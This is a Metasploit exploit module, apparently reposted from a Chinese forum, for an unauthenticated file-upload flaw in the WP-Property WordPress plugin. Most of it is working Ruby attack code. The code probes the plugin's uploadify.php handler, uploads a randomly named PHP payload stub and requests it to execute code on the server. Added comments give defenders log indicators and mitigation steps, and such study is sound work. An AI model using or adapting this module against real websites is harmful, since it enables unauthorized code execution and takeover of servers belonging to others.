WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

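# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0, per the module description below).
#
# Notes for defenders and reviewers:
# * The vulnerable endpoint is the bundled upload handler at
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php.
#   It accepts a multipart upload without authentication and stores the
#   file where the web server will run it as PHP.
# * In access logs the module shows up as a POST to that handler followed
#   by a GET for a five-letter, randomly named .php file.
# * The stub is requested with :unlink_self => true, so the uploaded file
#   is presumably removed once it has run. The web logs, not the file
#   system, are then the durable evidence. Confirm against PhpEXE.
# * Mitigation: update the plugin past the affected range (the page only
#   states <= 1.35.0; confirm the fixed release with the vendor), remove or
#   deny access to the uploadify handler, and disable PHP execution in
#   directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The listing rendered this mixin as "Msf::Exploit: hpEXE" (the ":P" was
  # eaten by the forum). The file requires msf/core/exploit/php_exe, and
  # get_write_exec_payload below comes from that mixin.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, disclosure date)
  # and the TARGETURI option that points at the WordPress base path.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Reports whether the upload handler is reachable.
  #
  # Returns CheckCode::Unknown when there is no response or the status is
  # not 200, and CheckCode::Appears otherwise. A 200 only shows that
  # uploadify.php exists at the expected path. It does not establish the
  # plugin version or that uploads are accepted, so treat "Appears" as a
  # prompt to verify the installed version, not as confirmation.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP stub through the uploadify handler and then requests it.
  #
  # Fails with Failure::UnexpectedReply when the upload gets no response, a
  # non-200 status, or a body that does not mention the uploaded file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter file name with a .php extension.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form fields: the file itself ("Filedata") and the destination
    # directory ("folder"), which is the handler's own directory.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops a CRLF that sits in front of a "--_Part_" boundary line;
    # presumably the leading one emitted by Rex::MIME::Message#to_s.
    # TODO confirm against Rex.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end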
不要问我这写的是什么 怎么利用 我是说msf.